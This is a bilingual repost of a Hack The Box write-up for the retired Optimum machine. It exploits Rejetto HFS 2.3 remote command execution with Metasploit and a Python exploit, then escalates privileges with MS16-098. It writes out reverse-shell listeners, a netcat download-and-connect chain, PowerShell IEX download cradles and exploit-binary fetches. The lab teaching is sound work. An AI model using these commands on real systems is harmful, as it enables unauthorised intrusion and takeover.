热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文




Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world scenarios and some of them leaning more towards a CTF style of challenge.

Hack The Box(HTB)是一个在线平台,可让您测试渗透测试技能。 它包含一些不断更新的挑战。 其中一些模拟现实世界的场景,而另一些则更倾向于CTF的挑战风格。

Note. Only write-ups of retired HTB machines are allowed.


Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits. Both exploits are easy to obtain and have associated Metasploit modules, making this machine fairly simple to complete

Optimum是初学者级别的机器,主要致力于枚举具有已知漏洞的服务。 两种漏洞利用都很容易获得,并且具有关联的Metasploit模块,这使得该机器的安装相当简单

We will use the following tools to pawn the box on a Kali Linux box

我们将使用以下工具将盒子当成Kali Linux盒子

  • nmap


  • zenmap


  • searchsploit


  • metasploit


第1步-扫描网络 (Step 1 - Scanning the network)

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.


This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as you could.

这是最重要的部分之一,因为它将决定您以后可以尝试利用的内容。 最好在该阶段花费更多的时间以获取尽可能多的信息。

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

我将使用Nmap(网络映射器)。 Nmap是一个免费的开源实用程序,用于网络发现和安全审核。 它使用原始IP数据包来确定网络上可用的主机,这些主机提供的服务,它们正在运行的操作系统,使用的数据包过滤器/防火墙的类型以及许多其他特征。

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here

此工具可以使用许多命令来扫描网络。 如果您想了解更多信息,可以在这里查看文档

I use the following command to get a basic idea of what we are scanning


nmap -sV -O -F --version-light

-sV: Probe open ports to determine service/version info


-O: Enable OS detection


-F: Fast mode - Scan fewer ports than the default scan


--version-light: Limit to most likely probes (intensity 2)

--version-light:限制为最可能的探测(强度2) IP address of the Optimum box “最佳”框的IP地址

You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

您也可以使用Zenmap,这是官方的Nmap Security Scanner GUI。 它是一个多平台,免费和开源的应用程序,旨在使Nmap易于初学者使用,同时为经验丰富的Nmap用户提供高级功能。

I use a different set of commands to perform an intensive scan


nmap -A -v

-A: Enable OS detection, version detection, script scanning, and traceroute


-v: Increase verbosity level

-v:提高详细程度 IP address of the Optimum box “最佳”框的IP地址

If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports

如果发现结果有点不堪重负,则可以移至“ 端口/主机”选项卡以仅获取打开的端口

We can see that there is 1 open port:


Port 80. Hypertext Transfer Protocol (HTTP). Here it's an HttpFileServer httpd 2.3

端口 80 。 超文本传输​​协议(HTTP)。 这是HttpFileServer httpd 2.3

For now, this is our main target


第2步-访问网站 (Step 2 - Visiting the website)

Let's try the port 80 and visit


We can see at the bottom of the page the server information. We have an HttpFileServer 2.3

我们可以在页面底部看到服务器信息。 我们有一个HttpFileServer 2.3

A HTTP File Server, also known as HFS, is a free web server specifically designed for publishing and sharing files.

HTTP文件服务器 ,也称为HFS,是专门设计用于发布和共享文件的免费Web服务器。

The official documentation describes HFS as:


HFS (Http File Server) is a file sharing software which allows you to send and receive files. You can limit this sharing to just a few friends, or be open to the whole world. HFS is different from classic file sharing because there is no network. HFS is a web server which uses web technology to be more compatible with today's Internet. Since it is actually a web server, your friends can download files as if they were downloading from a website using a web browser, such as Internet Explorer or Firefox. Your users don't have to install any new software. HFS lets you share your files. Most web servers are used to publish a website, but HFS is not designed to do that. You are, however, free to use it in any way you wish, - but at your own risk.
HFS(Http文件服务器)是一种文件共享软件,可让您发送和接收文件。 您可以将此共享限制为仅几个朋友,或者向全世界开放。 HFS与经典文件共享不同,因为没有网络。 HFS是一种Web服务器,它使用Web技术与当今的Internet更加兼容。 由于它实际上是一台Web服务器,因此您的朋友可以像使用Web浏览器(例如Internet Explorer或Firefox)从网站下载文件一样下载文件。 您的用户不必安装任何新软件。 HFS使您可以共享文件。 大多数Web服务器都用于发布网站,但是HFS并非旨在这样做。 但是,您可以随意使用它,但需要您自担风险。

I use Searchsploit to check if there is any known vulnerability on HFS. Searchsploit is a command line search tool for Exploit Database

我使用Searchsploit来检查HFS上是否存在任何已知漏洞。 Searchsploit是漏洞数据库的命令行搜索工具

I use the following command


searchsploit HFS

We can see several vulnerabilities, but we will examine the Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) with this command

我们可以看到几个漏洞,但是我们将使用此命令检查Rejetto HTTP文件服务器(HFS)-远程命令执行(Metasploit)

searchsploit -x 34926.rb

We have a summary of the exploit and the code


In the description we can see that the


Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.
由于文件ParserLib.pas中的正则表达式不正确,Rejetto HttpFileServer(HFS)容易受到远程命令执行攻击。 此模块通过使用'%00'绕过过滤来利用HFS脚本命令。 此模块已通过Windows XP SP3,Windows 7 SP1和Windows 8在HFS 2.3b上成功测试。

We can also find the exploit on the Exploit Database website


As well as on the Rapid7 website


We know that the version of the application is HttpFileServer 2.3

我们知道该应用程序的版本是HttpFileServer 2.3

We will use Metasploit, which is a penetration testing framework. It's an essential tool for many attackers and defenders

我们将使用Metasploit ,这是一个渗透测试框架。 对于许多攻击者和防御者来说,这是必不可少的工具

I launch Metasploit Framework on Kali and look for command I should use to launch the exploit

我在Kali上启动Metasploit框架 ,并寻找启动漏洞利用程序所需的命令

If you want to get more info on the exploit, you can use the following command


info exploit/windows/http/rejetto_hfs_exec

And you will get some detailed information on the exploit


I use the following command to use the exploit


use exploit/windows/http/rejetto_hfs_exec

I need to set up several options before launching the exploit


I start by setting the RHOSTS with the following command



and I set the SRHVOST with



When I check the options, I get this


I  then run the exploit with the command



And I get a Meterpreter session


From the Offensive Security website, we get this definition for Meterpreter

从“ 进攻性安全”网站上,我们获得了Meterpreter的定义

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Meterpreter是一种高级的,动态可扩展的有效负载,它使用内存中的 DLL注入暂存器,并在运行时通过网络进行了扩展。 它通过暂存器套接字进行通信,并提供全面的客户端Ruby API。 它具有命令历史记录,制表符完成,通道等功能。

You can read more about Meterpreter here.


Let's start by gathering some information


getuid returns the real user ID of the calling process and sysinfo returns certain statistics on memory and swap usage, as well as the load average

getuid返回调用过程的真实用户ID, sysinfo返回有关内存和交换使用情况以及平均负载的某些统计信息

If we look closely, we can see that Optimum’s architecture is x64, but our meterpreter version is set to x86. We will need to change this!

如果仔细观察,可以看到Optimum的体系结构是x64 ,但是我们的meterpreter版本设置为x86。 我们将需要更改此设置!

I put this session in the background with the command



I check the module options one more time and I see that the payload options are not correctly set up


It is using



instead of



I set up the payload with the following command


set payload windows/x64/meterpreter/reverse_tcp

I get another meterpreter session, and when I check the sysinfo, I can see that I have the correct meterpreter version this time, x64/windows

我得到另一个meterpreter会话,当我检查sysinfo时 ,可以看到这次我具有正确的meterpreter版本, x64 / windows

步骤3-寻找user.txt标志 (Step 3 - Looking for the user.txt flag)

Now that I have a session, I can list all the files/folders with the following command



And I find the user flag! I can check the content of the file with

而且我找到了用户标志! 我可以用检查文件的内容

cat user.txt.txt

I try to navigate to the Administrator folder but got an access is denied message. I need to do a privilege escalation to capture the root.txt flag

我尝试导航到Administrator文件夹,但收到拒绝访问消息。 我需要进行特权升级以捕获root.txt标志

步骤4-使用Metasploit进行权限升级 (Step 4 - Using Metasploit for privilege escalation )

I will use the module post/multi/recon/local_exploiter_suggester

我将使用模块post / multi / recon / local_exploiter_suggester

From the Rapid7 website, I get this


This module suggests local meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter. It's important to note that not all local exploits will be fired. Exploits are chosen based on these conditions: session type, platform, architecture, and required default options.
该模块建议可以使用的本地计费器利用。 根据用户打开外壳的体系结构和平台以及meterpreter中的可用漏洞,建议利用漏洞。 重要的是要注意,并非所有本地漏洞都会被解雇。 根据以下条件选择漏洞利用:会话类型,平台,体系结构和所需的默认选项。

I check for the options and I list all the sessions to make sure to pick the right one


I set session 2 to point the exploit at the x64 meterpreter session

我将会话2设置为将漏洞利用指向x64 meterpreter会话


and set the description to have a detailed explanation of any suggested exploits



I launch the exploit but nothing seems to come back


Going back to the second sessions with


sessions 2

and checking sysinfo once again gives us more information on the operating system. We can see it is a Windows 2012 R2

并再次检查sysinfo可为我们提供有关操作系统的更多信息。 我们可以看到它是Windows 2012 R2

I do a Google search to find any privilege escalation exploit on Windows 2012 R2 and find this exploit

我在Google搜索中找到Windows 2012 R2上的任何特权升级漏洞并找到了该漏洞

As well as the official Microsoft Security Bulletin on MS16-032


Back on Metasploit, I check if there is any exploit available and I find one with


search ms16-032

I check the options and set up the session






and the target to Windows x64

目标到Windows x64

set TARGET 1

I check the options to see if everything is configured properly


I launch the exploit but it doesn't seem to work anymore. I will need to exploit it manually without the help of Metasploit!

我启动了该漏洞利用程序,但似乎不再起作用。 我将需要在没有Metasploit的帮助下手动利用它!

步骤5-创建一个低特权反向shell (Step 5 - Creating a low privilege reverse shell)

Back on searchsploit, I check the results from


searchsploit HFS

I can see several vulnerabilities, but I will examine the '2.3.x - Remote Command Execution (1)' first with this command

我可以看到几个漏洞,但是我将首先使用此命令检查“ 2.3.x-远程命令执行(1)”

searchsploit -x 34668.txt

I have an explanation of the exploit


I then examine the '2.3.x - Remote Command Execution (2)' with this command

然后,我使用此命令检查“ 2.3.x-远程命令执行(2)”

searchsploit -x 39161.py

I have a summary of the exploit and the code. I then have a look at the code and the description

我对漏洞利用和代码进行了总结。 然后,我看一下代码和说明

You can use HFS (HTTP File Server) to send and receive files. It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.
您可以使用HFS(HTTP文件服务器)发送和接收文件。 它与经典文件共享不同,因为它使用Web技术与当今的Internet更加兼容。 它也不同于传统的Web服务器,因为它非常易于使用,并且可以“即开即用”地运行。 通过网络访问您的远程文件。 它已在Linux下与Wine一起成功测试。

Then at the note that explains that it depends on a web server to download and leverage nc.exe to get the reverse shell


You need to be using a web server hosting netcat (http://:80/nc.exe)
您需要使用托管netcat的Web服务器(http:// :80 / nc.exe)

If you check the help section of searchsploit, we can copy an exploit to the current directory


I use the following command to copy the file


searchsploit -m 39161.py

Then I use this command to modify the file


nano 39161.py

and change the hard coded IP address to the one of the attacking machine - my machine in this case


ip_addr = "" #local IP address

I create a www folder


and I copy nc.exe over


I launch the exploit. On the first window on the top left, I launch a small python server with

我启动漏洞利用程序。 在左上方的第一个窗口中,我启动了一个小型python服务器

python -m SimpleHTTPServer 80

The SimpleHTTPServer module that comes with Python is a simple HTTP server that provides standard GET and HEAD request handlers


The second window on the top right has netcat listening. I set up a Ncat listener on port 443 to catch the reverse shell connection

右上角的第二个窗口有netcat监听。 我在端口443上设置了Ncat侦听器,以捕获反向Shell连接

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users

Ncat是一个功能丰富的联网实用程序,可从命令行跨网络读取和写入数据。 Ncat是为Nmap项目编写的,是对久负盛名的Netcat的重新改进。 它同时使用TCP和UDP进行通信,并且被设计为可靠的后端工具,可以立即为其他应用程序和用户提供网络连接。

You can learn more about Ncat here


nc -nvlp 443

The third window has the python exploit - I had to launch the script twice, one to trigger nc.exe and the other to get the reverse shell

第三个窗口具有python漏洞利用程序-我不得不启动两次脚本,一个触发nc.exe ,另一个触发反向shell。

The python exploit (3rd window) will connect to the python server (1st window) to download the nc.exe Windows binary. Then nc.exe connects back to the Ncat listener on port 443 (2nd window) and will create a low privilege reverse shell

python exploit(第三个窗口)将连接到python服务器(第一个窗口),以下载nc.exe Windows二进制文件。 然后nc.exe在端口443(第二个窗口)上连接回到Ncat侦听器,并将创建一个低特权反向外壳程序

python 39161.py 80

You can check see the user is Kostas on this machine



I can then navigate on Kostas machine to get the user flag!


I check who I am on the machine with the command,



list the files/folders with



and show the user flag content with


type user.txt.txt

I find the user flag! Let's get the root flag now :)

我找到了用户标志! 现在让我们获取根标志:)

步骤 6a- 使用 GDSSecurity / Windows-Exploit-Suggester (Step 6a - Using GDSSecurity/Windows-Exploit-Suggester)

I show the system information with



I copy/paste the findings on a systeminfo.txt file


I will use Windows-Exploit-Suggester from GDSSecurity

我将使用GDSSecurity的 Windows-Exploit-Suggester

This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
此工具将目标补丁程序级别与Microsoft漏洞数据库进行比较,以检测目标上可能缺少的补丁程序。 它还会通知用户是否有可用于丢失公告的公用漏洞利用程序和Metasploit模块。
It requires the 'systeminfo' command output from a Windows host in order to compare that the Microsoft security bulletin database and determine the patch level of the host.
它需要Windows主机的“ systeminfo”命令输出,以便比较Microsoft安全公告数据库并确定主机的补丁程序级别。
It has the ability to automatically download the security bulletin database from Microsoft with the --update flag, and saves it as an Excel spreadsheet.

I copy/paste the raw windows-exploit-suggester python script on a file and then modify the file

我将原始的windows-exploit-suggester python脚本复制/粘贴到文件上,然后修改该文件

nano windows-exploit-suggester.py

to paste the code from the GitHub repository. We now have our 2 files into the same folder, systeminfo.txt and windows-exploit-suggester.py

从GitHub仓库粘贴代码。 现在,我们将2个文件放入相同的文件夹中,即systeminfo.txtWindows-exploit-suggester.py

I can find out more about this tool with the following command


python windows-exploit-suggester.py -h

I update the database of the tool with the following command


python windows-exploit-suggester.py --update

I run the script with


python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2019-10-08-mssb.xls

I can see that there are several missing CVEs on this machine. I will target the MS16-032 vulnerability

我可以看到这台计算机上缺少几个CVE。 我将针对MS16-032漏洞

步骤6b-使用Sherlock枚举KB (Step 6b - Using Sherlock to enumerate KBs)

I will use Sherlock to enumerate the KB on this machine. Sherlock is a PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

我将使用Sherlock枚举此计算机上的KB。 Sherlock是一个PowerShell脚本,可以快速找到缺少的本地补丁程序升级漏洞的软件补丁。

You can learn more on Sherlock here


When I ran the sysinfo command in Step 6a, I could see a list of KBs. KB stands for Knowledge Base. Microsfot defines it as

当我在步骤6a中运行sysinfo命令时,我可以看到KB列表。 KB代表知识库。 Microsfot将其定义为

The Microsoft Knowledge Base has more than 150,000 articles. These articles were created by thousands of support professionals who have resolved issues for our customers. The Microsoft Knowledge Base is regularly updated, expanded, and refined to help make sure that you have access to the very latest information.
Microsoft知识库中有超过150,000篇文章。 这些文章是由成千上万的支持专业人员创建的,他们为我们的客户解决了问题。 Microsoft知识库会定期更新,扩展和完善,以确保您可以访问最新信息。

You can learn more on KB here


I git clone the Sherlock repository to my local and move it to the www/ folder

我将Sherlock储存库克隆到本地,然后将其移动到www /文件夹

I change the file Sherlock.ps1 and add Find-Allvulns at the end of the Powershell script with


nano Sherlock.ps1

I then use the following command


wget ""

to fetch the file from Kostas' machine


I then launch Sherlock with the following command


IEX(New-Object Net.Webclient).downloadString('')

It will go through all the KB


and returns with which ones are vulnerable


步骤7-使用RGNOBJ整数溢出进行特权升级 (Step 7 - Using RGNOBJ Integer Overflow for privilege escalation)

At Step 6a, when I got the result back from the Windows Exploit Suggester, one of the exploit targets Windows 8.1 (x64)

步骤6a中 ,当我从Windows漏洞利用建议程序获得结果时,其中一个漏洞利用目标是Windows 8.1(x64)

If we have a look at the Microsoft documentation, we can see that Windows Server 2012 R2 is related to Windows 8.1 and has the same build number. We can assume the exploit might work as well on it

如果我们查看Microsoft文档,就会发现Windows Server 2012 R2与Windows 8.1相关,并且具有相同的内部版本号。 我们可以假设该漏洞利用程序也可以正常工作

I look on searchsploit


searchsploit m16-098

I can also find it on the Exploit Database website


I use the following command to copy the file


searchsploit -m 41020.c

The exploit needs to be compiled before it can be executed. I check the code with

该漏洞需要先编译才能执行。 我检查代码

cat 41020.c

I can see in the comments that the exploit has a pre-compiled Windows binary available that can be used


I copy the exploit with the wget command and move the file to my www folder


wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

I set up another python server - I kill the previous one.


python -m SimpleHTTPServer 80

On the other window, on Kostas machine I use powershell to download the exploit


powershell wget "" -outfile "exploit.exe"

I then execute the exploit with



I can see that the privilege escalation was a success by checking who I am on the machine



It returns


nt authority\system

I am admin


Let's find the root flag now! I navigate up to Users and check in to the Administrator/Desktop folder. I find the flag!

让我们现在找到根标志! 我向上导航至“用户”并签入“管理员/桌面”文件夹。 我找到了旗帜!

I use the following command to see the content of the file


type root.txt

Congrats! You found both flags!

恭喜! 您找到了两个标志!

Please don’t hesitate to comment, ask questions or share with your friends :)


You can see more of my articles here


You can follow me on Twitter or on LinkedIn


And don't forget to #GetSecure, #BeSecure & #StaySecure!

并且不要忘记# GetSecure ,# BeSecure#StaySecure !

Other Hack The Box articles

其他Hack The Box文章

  • Keep Calm and Hack The Box - Lame


  • Keep Calm and Hack The Box - Legacy


  • Keep Calm and Hack The Box - Devel


  • Keep Calm and Hack The Box - Beep


翻译自: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-optimum/


PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有